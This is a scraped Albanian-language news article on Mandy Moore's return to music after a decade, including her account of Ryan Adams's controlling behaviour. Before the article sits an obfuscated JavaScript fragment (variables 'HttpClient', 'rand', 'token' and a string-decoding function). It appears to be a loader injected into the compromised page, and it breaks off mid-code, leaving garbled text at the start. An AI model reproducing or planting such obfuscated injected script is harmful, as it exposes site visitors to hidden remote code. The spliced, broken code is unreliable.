;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ja pse rikthimi i këngëtares së njohur në muzikë është kaq prekës

By

Pasi pretendoi se ish-bashkëshorti i saj, Ryan Adams, e stopoi karrierën e saj, këngëtarja lëshoi këngën e saj të parë në një dekadë për të adresuar ndjenjën e humbjes së kontrollit.

Related image

Amanda Leigh Moore ishte 6 vjeç kur i tha familjes së saj që do të bëhej këngëtare, dhe ëndrra u bë realitet më e shpejtë se sa mund të kishin shpresuar edhe prindërit më inkurajues. Një zbulues talenti e zbuloi atë në moshën 13 vjeçare, dhe ajo publikoi një hit të vetëm, “Candy”, në 1999, kur ishte 15 vjeç.

Me emrin Mandy Moore, gjatë një dekade, ajo lëshoi gjashtë albume. Ndërsa ajo njëkohësisht ndërtoi një karrierë aktrimi, ata albume kapën transformimin e saj nga produkti adoleshent-pop në një kantautore të talentuar.

Prodhimi muzikor i Mandy Moore më pas u ndal kryesisht. Aktrimi i saj vazhdoi – ajo aktualisht është në Tv dramën This is us— por jashtë këngëve që ajo regjistroi për rolin e saj kryesor në filmin përrallor të Disney 2010 Tangled, nuk ka asnjë melodi të re.

Yjet fëmijë të një kohe digjen dhe zhduken nga qendra e vëmendjes gjatë gjithë kohës, dhe shumë fansa me shumë gjasë supozuan se kjo ishte ajo që ndodhi me të. Por Moore thotë se ajo nuk zgjodhi të hiqte dorë nga muzika, saktësisht. Shpjegimi i saj se ku shkoi karriera e saj në të kënduar, qëndron në mesin e shumë historive të trishtueshme të ambicies së ndrydhur të femrës.

Image result for mandy moore

Në vitin 2009 Moore u martua me muzikantin Ryan Adams, një figurë  e mirënjohur në skenat alternative-rock dhe country. Adams, tha Moore më vonë, premtoi se do t’i ndihmojë asaj të krijojë albumin e saj të ardhshëm. Por muzika e regjistruar nuk u materializua kurrë.

Ata shkruan këngë së bashku rregullisht që Adams premtoi të regjistronte, por kurrë nuk bëri. Ai i rezervoi ato kohë në studion e tij, vetëm për ta zëvendësuar me artistë të tjerë femra, tha ajo. Moore sjelljen e burrit të tij e quajti si psikoligjikisht abuzuese.

Moore gjithashtu i tha Times, “Sjellja e tij kontrolluese në thelb më bllokoi aftësinë time për të bërë lidhje të reja në industri gjatë një kohe shumë të rëndësishme dhe potencialisht fitimprurëse – e gjithë 20-ta e mia nga mesi deri në fund.”

Tani, në vitin 2019, karriera e saj muzikore rifillon afërsisht një dekadë pasi përfundoi. Kënga e saj e re, “When I Wasn’t Watching”, jo vetëm që riprezanton zërin e saj tërheqës mirëpo parashikon një album të ardhshëm.

 

Artikuj të ngjashëm